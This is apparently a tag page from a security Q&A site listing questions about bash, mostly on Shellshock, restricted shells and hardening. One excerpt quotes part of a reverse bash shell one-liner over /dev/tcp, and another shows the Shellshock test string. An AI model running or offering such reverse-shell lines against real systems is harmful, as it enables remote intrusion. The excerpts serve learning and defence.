The Bourne-again shell (Bash) is a unix shell. It lets the user run commands on the host machine in as a text based program. Questions using this tag should either be related to vulnerabilities of bash or proper use of specific commands.
Questions tagged [bash]
152 questions
7
votes
1 answer
List wireless stations around me
I'm looking to find a specific wireless user around me, I have his MAC address, I even have the channel he is on.
I've tried iwlist peers, to no avail, as well as airodump. I have seen his mac pop up under airodump, but it is quickly buried under…
unknown6708
- 111
- 1
- 5
7
votes
4 answers
How can I use netcat like ping?
How can we use the netcat (nc) to determine whether a particular machine is running web, mail or SSH services?
stevGates
- 197
- 1
- 1
- 4
6
votes
1 answer
When Shellshock was introduced, how bad was it **then**?
The shellshock bug, and the underlying feature allowing Function Import from the Environment (I'm calling it FIE), have been in bash since at least 1993, before the rise of CGI.
At that time, the rest of the Unix/Linux/GNU environment was very…
Ben
- 3,697
- 1
- 18
- 24
6
votes
2 answers
How does the ShellShock exploit work over OpenSSH?
The three options listed in the CERT release (AcceptEnv TERM and SSH_ORIGINAL_COMMAND) are all server-side options. If none of these are set on a host (and no http vector is available) is the host secure, even if Bash remains unfixed? If I set…
Chinthamani
- 61
- 1
- 3
6
votes
5 answers
Should I remove bash from my Docker web app container?
Suppose I am a developer and want to harden my web application environment. If my application does not make use of binaries like sh, ls, find, echo etc. Should I just remove them from my image?
user1330734
- 389
- 7
- 16
6
votes
2 answers
Turned on cgi.fix_pathinfo still "dangerous" in Nginx?
In this article in digitalocean.com Justin Ellingwood recommends to turn off cgi.fix_pathinfo:
Inside, we need to find a section that configures the cgi.fix_pathinfo
behavior. It will be commented out and set to "1" by default. We need
to…
Arcticooling
- 269
- 2
- 13
5
votes
2 answers
Is my shell prompt visible to public?
Let say my local system's shell prompt is in this format: myname@mysurname:~$
Is it logged in some server when I login there via SSH/FTP? Or is it completely private information?
Onsur
- 361
- 2
- 5
5
votes
0 answers
Why am I getting seemingly random fingerprints back when connecting via SSH/SCP?
I manage an application that connects to various servers using a client-specific keypair. We have around 70 customers; all but one can connect to our FTP server (for SCP) after first accepting the RSA fingerprint (which hasn't changed in ~5…
Andrew
- 51
- 1
5
votes
4 answers
Is it possible to execute a local file or code from cURL?
I wonder if it is possible to execute bash code or a local file from cURL, that is, using the following syntax:
curl "local file"
I was looking for possible solutions and found that to read the local files of the system can be done with "file://"…
Julián
- 249
- 1
- 4
- 10
5
votes
2 answers
WireGuard: what's wrong with this automatic IP assignment
WireGuard is extremely simple and fast kernel-space VPN based on modern cryptography. I want to use it in production and need automatic IP assignment for new peers. The project provides two short scripts for server and client that do just this.…
user1876484
- 279
- 3
- 6
5
votes
1 answer
Reverse Bash Shell one liner
I know that when the following code is run a reverse bash shell is created from the victim's computer to the attacker's computer. Can someone please explain to me the significance of the number "196"?
0<&196;exec 196<>/dev/tcp//
LazyTrout17
- 153
- 1
- 5
5
votes
1 answer
Why is `cd` restricted in rbash/restricted bash?
The bash manual says:
A restricted shell behaves identically to bash with the exception that
the following are disallowed or not performed:
Changing directories with the cd builtin.
Why is this not allowed? What security holes does this close /…
Michael Thorpe
- 153
- 1
- 5
4
votes
1 answer
Bash scripting and password input
I am writing a bash script and prompt the user for his password.
This password is supplied for either a local or domain account to query a MS SQL Server (using sqsh and freetds).
How secure is the code below ?
echo "What is the password for $mssqlu…
Florian Bidabé
- 703
- 4
- 10
4
votes
1 answer
Am I safe if browsing to /cgi-bin/ returns HTTP 403?
I am wondering whether my server could be vulnerable to ShellShock (or better: was vulnerable). The shell test reveals that I'm vulnerable:
$ export evil='() { :;}; echo vulnerable'; bash -c echo;
vulnerable
I don't need CGI for any of my websites,…
Thomas Weller
- 3,246
- 3
- 21
- 39
4
votes
1 answer
Is vmware vulnerable to shellshock?
We have tons of vmware hosted servers in our DMZ environment, with the recent shellshock bash bug, what do I need to do to protect our environment?
Overachiever
- 143
- 1
- 4